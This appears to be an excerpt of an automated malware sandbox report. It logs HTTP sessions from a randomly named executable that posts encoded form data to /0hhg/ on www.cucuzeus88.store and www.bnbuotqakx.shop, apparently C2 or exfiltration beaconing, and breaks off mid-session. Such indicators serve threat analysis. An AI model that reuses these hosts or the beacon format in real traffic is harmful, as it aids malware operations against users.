                                                                                                    37192.168.2.449774153.92.8.4180916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:27:42.150662899 CEST711OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.cucuzeus88.store
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.cucuzeus88.store
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 205
                                                                                                    Referer: http://www.cucuzeus88.store/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 71 54 38 4b 50 74 55 44 6b 77 2b 67 75 47 4e 4a 79 5a 41 2b 41 45 57 46 55 4e 50 66 62 6f 6a 5a 31 48 36 50 70 56 68 76 30 59 65 44 6a 30 73 50 64 72 32 61 4a 54 69 4e 4c 4f 6f 48 74 78 36 62 35 57 45 37 55 46 30 78 68 5a 79 4d 79 39 35 5a 32 77 59 42 2b 4d 5a 63 4a 53 68 51 71 42 47 6b 71 2b 61 55 30 4c 59 7a 2f 49 2f 53 64 61 37 45 46 4c 76 73 43 4c 4d 72 7a 52 36 76 69 31 50 70 42 58 47 33 66 71 35 55 37 69 59 71 77 53 4c 46 67 63 36 6c 52 48 43 69 63 76 32 69 5a 6c 7a 4c 5a 6c 6f 35 6d 39 79 72 74 4b 66 45 38 48 2b 53 34 72 78 72 39 6f 6c 79 73 32 4d 66 35 71 62 36 35 41 3d 3d
                                                                                                    Data Ascii: ABqDW6A8=qT8KPtUDkw+guGNJyZA+AEWFUNPfbojZ1H6PpVhv0YeDj0sPdr2aJTiNLOoHtx6b5WE7UF0xhZyMy95Z2wYB+MZcJShQqBGkq+aU0LYz/I/Sda7EFLvsCLMrzR6vi1PpBXG3fq5U7iYqwSLFgc6lRHCicv2iZlzLZlo5m9yrtKfE8H+S4rxr9olys2Mf5qb65A==
                                                                                                    May 2, 2024 08:27:42.998332024 CEST711OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.cucuzeus88.store
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.cucuzeus88.store
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 205
                                                                                                    Referer: http://www.cucuzeus88.store/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 71 54 38 4b 50 74 55 44 6b 77 2b 67 75 47 4e 4a 79 5a 41 2b 41 45 57 46 55 4e 50 66 62 6f 6a 5a 31 48 36 50 70 56 68 76 30 59 65 44 6a 30 73 50 64 72 32 61 4a 54 69 4e 4c 4f 6f 48 74 78 36 62 35 57 45 37 55 46 30 78 68 5a 79 4d 79 39 35 5a 32 77 59 42 2b 4d 5a 63 4a 53 68 51 71 42 47 6b 71 2b 61 55 30 4c 59 7a 2f 49 2f 53 64 61 37 45 46 4c 76 73 43 4c 4d 72 7a 52 36 76 69 31 50 70 42 58 47 33 66 71 35 55 37 69 59 71 77 53 4c 46 67 63 36 6c 52 48 43 69 63 76 32 69 5a 6c 7a 4c 5a 6c 6f 35 6d 39 79 72 74 4b 66 45 38 48 2b 53 34 72 78 72 39 6f 6c 79 73 32 4d 66 35 71 62 36 35 41 3d 3d
                                                                                                    Data Ascii: ABqDW6A8=qT8KPtUDkw+guGNJyZA+AEWFUNPfbojZ1H6PpVhv0YeDj0sPdr2aJTiNLOoHtx6b5WE7UF0xhZyMy95Z2wYB+MZcJShQqBGkq+aU0LYz/I/Sda7EFLvsCLMrzR6vi1PpBXG3fq5U7iYqwSLFgc6lRHCicv2iZlzLZlo5m9yrtKfE8H+S4rxr9olys2Mf5qb65A==
                                                                                                    May 2, 2024 08:27:43.348754883 CEST1069INHTTP/1.1 301 Moved Permanently
                                                                                                    Connection: close
                                                                                                    content-type: text/html
                                                                                                    content-length: 795
                                                                                                    date: Thu, 02 May 2024 06:27:43 GMT
                                                                                                    server: LiteSpeed
                                                                                                    location: https://www.cucuzeus88.store/0hhg/
                                                                                                    platform: hostinger
                                                                                                    content-security-policy: upgrade-insecure-requests
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    38192.168.2.449775153.92.8.4180916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:27:45.026424885 CEST731OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.cucuzeus88.store
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.cucuzeus88.store
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 225
                                                                                                    Referer: http://www.cucuzeus88.store/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 71 54 38 4b 50 74 55 44 6b 77 2b 67 6f 57 39 4a 68 71 34 2b 48 6b 57 47 58 4e 50 66 53 49 6a 64 31 48 32 50 70 55 55 30 7a 72 36 44 69 56 63 50 65 71 32 61 45 7a 69 4e 46 75 6f 49 77 68 36 63 35 57 42 4d 55 45 59 78 68 59 53 4d 79 39 4a 5a 32 48 73 47 73 73 5a 53 50 53 67 57 6b 68 47 6b 71 2b 61 55 30 4c 63 4e 2f 49 6e 53 64 71 72 45 58 2b 44 74 4c 72 4d 30 6b 68 36 76 31 6c 50 74 42 58 47 46 66 72 6b 4a 37 67 77 71 77 58 76 46 6a 49 57 6d 59 48 44 49 53 50 33 51 57 6b 65 4f 59 67 64 61 34 37 65 31 74 61 4b 6b 77 68 76 49 70 61 51 38 76 6f 42 42 78 78 46 72 30 70 6d 7a 69 47 63 6e 76 47 76 56 46 38 62 58 31 50 75 34 6b 7a 33 32 32 76 77 3d
                                                                                                    Data Ascii: ABqDW6A8=qT8KPtUDkw+goW9Jhq4+HkWGXNPfSIjd1H2PpUU0zr6DiVcPeq2aEziNFuoIwh6c5WBMUEYxhYSMy9JZ2HsGssZSPSgWkhGkq+aU0LcN/InSdqrEX+DtLrM0kh6v1lPtBXGFfrkJ7gwqwXvFjIWmYHDISP3QWkeOYgda47e1taKkwhvIpaQ8voBBxxFr0pmziGcnvGvVF8bX1Pu4kz322vw=
                                                                                                    May 2, 2024 08:27:45.374144077 CEST1069INHTTP/1.1 301 Moved Permanently
                                                                                                    Connection: close
                                                                                                    content-type: text/html
                                                                                                    content-length: 795
                                                                                                    date: Thu, 02 May 2024 06:27:45 GMT
                                                                                                    server: LiteSpeed
                                                                                                    location: https://www.cucuzeus88.store/0hhg/
                                                                                                    platform: hostinger
                                                                                                    content-security-policy: upgrade-insecure-requests
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    39192.168.2.449776153.92.8.4180916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:27:47.900913954 CEST10813OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.cucuzeus88.store
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.cucuzeus88.store
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 10305
                                                                                                    Referer: http://www.cucuzeus88.store/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 71 54 38 4b 50 74 55 44 6b 77 2b 67 6f 57 39 4a 68 71 34 2b 48 6b 57 47 58 4e 50 66 53 49 6a 64 31 48 32 50 70 55 55 30 7a 72 79 44 69 6e 55 50 64 4a 4f 61 46 7a 69 4e 4e 4f 6f 4c 77 68 37 41 35 53 74 49 55 45 45 68 68 64 57 4d 77 63 70 5a 2b 54 77 47 6d 73 5a 53 4e 53 67 47 71 42 48 75 71 36 2f 64 30 4c 73 4e 2f 49 6e 53 64 73 76 45 56 72 76 74 4e 72 4d 72 7a 52 36 6a 69 31 50 56 42 58 4f 56 66 72 52 2b 34 52 51 71 77 33 2f 46 77 4e 36 6d 41 58 43 75 56 50 33 49 57 6b 53 46 59 6d 35 73 34 2f 65 54 74 59 57 6b 7a 45 79 49 30 4b 73 4b 78 5a 74 4d 6a 53 6c 65 77 37 43 2f 35 46 73 35 67 48 33 30 48 59 50 41 7a 64 76 64 38 42 54 54 33 6f 43 43 37 36 49 73 6e 47 49 41 6c 31 50 73 44 6b 69 4b 54 57 44 47 6c 69 59 36 4a 6b 58 68 59 53 4b 57 38 65 42 6f 75 72 6c 52 46 42 4e 64 63 73 41 4c 50 6f 72 62 33 6e 47 42 4c 2f 52 4f 35 43 33 44 41 48 43 71 56 5a 61 6a 53 6e 64 31 4a 61 66 74 37 64 4d 72 32 62 68 50 46 7a 65 34 56 75 7a 55 68 34 47 51 2f 77 35 57 6c 70 56 79 41 32 62 48 4a [TRUNCATED]
                                                                                                    Data Ascii: ABqDW6A8=qT8KPtUDkw+goW9Jhq4+HkWGXNPfSIjd1H2PpUU0zryDinUPdJOaFziNNOoLwh7A5StIUEEhhdWMwcpZ+TwGmsZSNSgGqBHuq6/d0LsN/InSdsvEVrvtNrMrzR6ji1PVBXOVfrR+4RQqw3/FwN6mAXCuVP3IWkSFYm5s4/eTtYWkzEyI0KsKxZtMjSlew7C/5Fs5gH30HYPAzdvd8BTT3oCC76IsnGIAl1PsDkiKTWDGliY6JkXhYSKW8eBourlRFBNdcsALPorb3nGBL/RO5C3DAHCqVZajSnd1Jaft7dMr2bhPFze4VuzUh4GQ/w5WlpVyA2bHJZTVZht6fGUJFlraqHBxvbnPsHSp2MsqFMCGINgqu3XJX+HcMMvqg/dMjOpC5Uuvd8mexZSmY0OVxeMq2/6Z1szK6f6ddFFMPrCF1BTjOo6QJw4EpsYH5qywY/ahtSVCntRWTLdEV66QieIZVxaOnkkO9gVttTzppW0P8RkMo4Pip1R+lA6Gs8Ap+hCr93yg+hMYK0mmqc+P1YWmcGdsRnS9GYt8HBrKKapLxFLtHbN2lwwx7thW6n68jQZUyYks8AF7PF55os5SWUaoYTZH6Ps2wy2+WjUAVUCyHYudSl32RtlxpYVg2tlfQvKU5ZqPf1xGHskIs8iyvh1gQYjBR0j7jSMEw6tXbE+TgEd+ROBpxljyoV3/NjTTRRXWVm5IWMcrzVPqEVtcqjBABzR2U+Ovjbu1MN/yMkLWp+i1zJFN3FA5G+w1LLnU0YzoGNjA+Ms3dsVwCKxXGW94wJ7i14YWA4Mk5LfM4XWtHBnY3Mn1p2BHdQIfzh2i7egQa7ExdVxwcYbXlPs2XjBDPaCblyFjExN67DoL36Gxe0gjIjcTAXp3vCMsZ3Obh5hJ4k3CIYMwRrKZ2PK442LXHStQET+hFkZZgfAHzGUhjs0N88XygYMgVKKsrV269GI5GYB+XSTDJ/W2py4cJnfJosDEWvC21NnMn5q6sH9 [TRUNCATED]
                                                                                                    May 2, 2024 08:27:48.241857052 CEST1069INHTTP/1.1 301 Moved Permanently
                                                                                                    Connection: close
                                                                                                    content-type: text/html
                                                                                                    content-length: 795
                                                                                                    date: Thu, 02 May 2024 06:27:48 GMT
                                                                                                    server: LiteSpeed
                                                                                                    location: https://www.cucuzeus88.store/0hhg/
                                                                                                    platform: hostinger
                                                                                                    content-security-policy: upgrade-insecure-requests
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    40192.168.2.449777153.92.8.4180916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:27:51.868494987 CEST440OUTGET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=nRUqMZh05AeT5XBXy6tvbUigcs6hc4rC+kK/un5r26ew8GYnMJKxFmClF8lXwwqE5TFZd2gxpf2h1MF48x8mm8dpDB1BgTHqwJGV3u14y6bwQsvyQrq4dK8= HTTP/1.1
                                                                                                    Host: www.cucuzeus88.store
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    May 2, 2024 08:27:52.211432934 CEST1217INHTTP/1.1 301 Moved Permanently
                                                                                                    Connection: close
                                                                                                    content-type: text/html
                                                                                                    content-length: 795
                                                                                                    date: Thu, 02 May 2024 06:27:52 GMT
                                                                                                    server: LiteSpeed
                                                                                                    location: https://www.cucuzeus88.store/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=nRUqMZh05AeT5XBXy6tvbUigcs6hc4rC+kK/un5r26ew8GYnMJKxFmClF8lXwwqE5TFZd2gxpf2h1MF48x8mm8dpDB1BgTHqwJGV3u14y6bwQsvyQrq4dK8=
                                                                                                    platform: hostinger
                                                                                                    content-security-policy: upgrade-insecure-requests
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    41192.168.2.449778101.99.93.15780916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:27:57.835331917 CEST708OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.bnbuotqakx.shop
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.bnbuotqakx.shop
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 205
                                                                                                    Referer: http://www.bnbuotqakx.shop/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 69 6b 73 4b 34 36 54 49 67 2b 4f 73 71 4f 43 2b 47 75 4b 55 46 65 63 2b 6d 76 33 33 72 31 58 48 47 63 65 2f 54 78 53 49 4c 2f 69 70 62 6c 75 6e 54 63 2f 4e 58 44 36 57 35 71 66 42 2b 38 44 61 4d 50 7a 49 72 6f 2b 46 6a 41 41 7a 6c 65 78 64 6a 77 59 44 77 74 62 56 31 32 42 72 6d 7a 56 54 53 30 6e 4c 31 44 7a 44 6b 70 37 78 70 2f 58 46 50 77 33 2f 47 34 73 65 46 65 70 6b 76 46 49 37 39 77 35 68 50 56 7a 54 5a 77 47 67 49 4a 67 78 37 63 4d 73 6d 45 46 32 51 4c 56 59 65 31 4a 77 6e 64 62 6e 31 68 55 6b 33 66 6d 2f 36 67 70 36 59 6e 6d 31 33 30 75 61 53 2f 49 59 64 59 35 50 79 41 3d 3d
                                                                                                    Data Ascii: ABqDW6A8=iksK46TIg+OsqOC+GuKUFec+mv33r1XHGce/TxSIL/ipblunTc/NXD6W5qfB+8DaMPzIro+FjAAzlexdjwYDwtbV12BrmzVTS0nL1DzDkp7xp/XFPw3/G4seFepkvFI79w5hPVzTZwGgIJgx7cMsmEF2QLVYe1Jwndbn1hUk3fm/6gp6Ynm130uaS/IYdY5PyA==
                                                                                                    May 2, 2024 08:27:58.029414892 CEST536INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx
                                                                                                    Date: Thu, 02 May 2024 06:27:57 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 548
                                                                                                    Connection: close
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome frie
                                                                                                    May 2, 2024 08:27:58.029445887 CEST155INData Raw: 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65
                                                                                                    Data Ascii: ndly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    42192.168.2.449779101.99.93.15780916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:28:01.684062958 CEST728OUTPOST /0hhg/ HTTP/1.1
